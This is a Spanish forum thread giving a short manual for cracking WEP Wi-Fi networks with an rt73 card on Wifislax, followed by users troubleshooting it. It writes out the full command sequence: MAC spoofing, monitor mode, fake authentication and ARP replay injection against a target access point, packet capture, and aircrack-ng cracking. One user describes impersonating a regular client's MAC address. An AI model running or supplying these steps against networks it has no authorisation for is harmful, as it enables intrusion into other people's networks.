Suite Seguridad Wireless > Manuales de Wifislax & Wifiway

Mini manual rt73 + Wifislax

(1/36) > >>

hadrianweb:
Lo primero que debemos hacer es un iwconfig para saber si no detecta el chip rt73 o rt2570, bueno si al lado de rausb0 no pone rt73 hacemos lo siguiente:

--- Citar ---ifconfig rausb0 down
macchanger -m 00:11:22:33:44:55 rausb0

--- Fin de la cita ---
Si si por el contrario no nos detecta el rt73 a estas lineas le añadimos:

--- Citar ---rmmod rt73
rmmod rt2570
modprobe rt73

--- Fin de la cita ---
Para finalizar la configuracion de la tarjeta hacemos lo siguiente:

--- Citar ---ifconfig rausb0 up
iwconfig rausb0 mode monitor

--- Fin de la cita ---
Con esto hecho podemos empezar a utilizar los programas especificos. Hacemos lo siguiente:

--- Citar ---airodump-ng rausb0

--- Fin de la cita ---
Con esto comprobamos cual es el canal de ap a atacar y tambien el bssid luego abrimos otra terminal y con el aireplay-ng hacemos de la siguiente forma:

--- Citar ---aireplay-ng -1 30 -e Nombre_del_ap -a mac_del_ap -h 00:11:22:33:44:55 rausb0

--- Fin de la cita ---
Y en otra terminal distinta hacemos lo siguiente:

--- Citar ---aireplay-ng -3 -b mac_del_ap -h 00:11:22:33:44:55 rausb0

--- Fin de la cita ---
Para finalizar en una terminal abrimos el airodump-ng de la siguinte forma:

--- Citar ---airodump-ng -c canal_ap -w nombre_archivo rausb0
--- Fin de la cita ---
Con esto lo que nos queda es esprar a que el aireplay-ng coja el arp. Para finalizar lo que tenemos que hacer es


--- Citar ---aircrack-ng -z archivo.cap rausb0
--- Fin de la cita ---

Y Ya esta ;D ;D


Hwagm:
PUes esta bastante claro.

djdava:
Hola, pues me surge un problema al utilizar los comandos que pone hadrianweb en el mini manual para las rt73. Lo que hago es exactamente lo que pone en ese manual, es decir pongo la rt73 en modo monito, en el mismo canal y con el essid del AP de esta forma:

iwconfig rausb0 mode monitor channel 11 essid default

Despues enxufo el airodump-ng en el canal 11, hago el ataque 1 y despues el ataque 3 igual como pone en el manual y me sale un error, diciendome que no estoy associado al AP y no me suben los data. He probado un monton de cosas y no se ke mas hacer. Os dejo una captura de lo que me pasa, a ver si me podeis ayudar.

P.D: para hacer el atake 1 me cambio la MAC, por la de un cliente que se suele conectar al AP.



Saludos!!

Hwagm:
si el cliente es wireless, no seria mejor esperar y efectuar directo un ataque 3.

Aparentemente todo esta correcto.

Es cuestion de espera.

¿que velocidad has fijado, me refiero al iwconfig rausb0 rate X?

djdava:
Tambien he probado de realizar el atake 3 cuando hay cliente conectado, pero me pasa exactamente lo mismo. Coje un ARP , enpiezan a subir los "sent", el data ni se mueve y me aparece el mismo error de desautentificacion.

El rate lo dejo como está por defecto, osea ke no lo toco.

pego aki lo ke me sale en el iwconfig?

Gracias y saludos!

Navegación

[0] Índice de Mensajes

[#] Página Siguiente

Ir a la versión completa